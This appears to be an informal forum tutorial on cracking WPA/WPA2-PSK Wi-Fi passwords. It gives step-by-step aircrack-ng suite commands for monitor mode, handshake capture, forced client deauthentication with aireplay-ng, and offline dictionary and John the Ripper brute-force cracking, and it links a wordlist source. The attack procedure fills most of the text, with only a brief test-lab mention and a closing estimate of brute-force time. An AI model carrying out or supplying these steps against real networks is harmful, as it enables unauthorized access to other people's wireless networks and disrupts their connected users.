Cracking Wpa-psk or Wpa2-psk

Welcome to my guide to crack wpa2-psk and wpa-psk

Follow my Steps Carefully and you will get it worked out

now put the card in monitoring mode by typing
airmon-ng start wlan0
now remember the interface (wlan0,mon0,ath0) depends
okay now let's check the networks around

airodump-ng mon0

wait 2 mins now press Control + Z

Copy the mac Adrress of the AP and channel and so on

now monitor the AP writing all packets to a file

airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2

At this point, you have 2 options : either wait until a client connects
and the 4-way handshake is complete, or deauthenticate an existing
client and thus force it to reassociate.  Time is money, so let’s force
the deauthenticate. We need the bssid of the AP (-a) and the mac of a
connected client (-c)

aireplay-ng -0 1 -a (AP mac Address) -c (Client mac address) mon0

now it will deauthinticate a client so when it reconnects you capture the hand-shake

13:04:19  Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20  Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]
that's how it looks when it works
As a result, airodump-ng should indicate “WPA Handshake:” in the upper right corner
Stop airodump-ng and make sure the files were created properly
From this point forward, you do not need to be anywhere near the
wireless network. All cracking will happen offline, so you can stop
airodump and other processes and even walk away from the AP. In fact, I
would suggest to walk away and find yourself a cosy place where you can
live, eat, sleep, etc…. Cracking a WPA2 PSK key is based on
bruteforcing, and it can take a very very long time.  There are 2 ways
of bruteforcing : one that is relatively fast but does not guarantee
success and one that is very slow, but guarantees that you will find
the key at some point in time

The first option is by using a wordlist/dictionary file. A lot of these files can be found on the internet (e.g. http://0a9c9e1f.youfap.com or on packetstorm (see the archives)), or can be generated with tools such as John The Ripper. Once the wordlist is created, all you need to do is run aircrack-ng with the worklist and feed it the .cap fie that contains the WPA2 Handshake.

So if your wordlist is called word.lst (under /tmp/wordlists), you can run

aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap

The success of cracking the WPA2 PSK key is directly linked to the strength of your password file. In other words, you may get lucky and get the key very fast, or you may not get the key at all.

The second method (bruteforcing) will be successfull for sure, but it may take ages to complete. Keep in mind, a WPA2 key can be up to 64 characters, so in theory you would to build every password combination with all possible character sets and feed them into aircrack. If you want to use John The Ripper to create all possible password combinations and feed them into aircrack-ng this is the command to use

root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap

(Note : the PSK in my testlab is only 8 characters, contains one uppercase character and 4 numbers). I will post the output when the key was cracked, including the time it required to crack the key.

That’s it

Update :after 20 hours of cracking, the key still has not been found. The system I’m using to crack the keys is not very fast, but let’s look at some facts :

8 characters, plain characters (lowercase and uppercase) or digits = each character in the key could has 26+26+10 (62) possible combinations. So the maximum number of combinations that need to be checked in the bruteforce process is 62 * 62 * 62 * 62 * 62 * 62 * 62 * 62 = 218 340 105 584 896 At about 600 keys per second on my “slow” system, it could take more than 101083382 hours to find the key (11539 year). I have stopped the cracking process as my machine is way too slow to crack the key while I’m still alive… So think about this when doing a WPA2 PSK Key.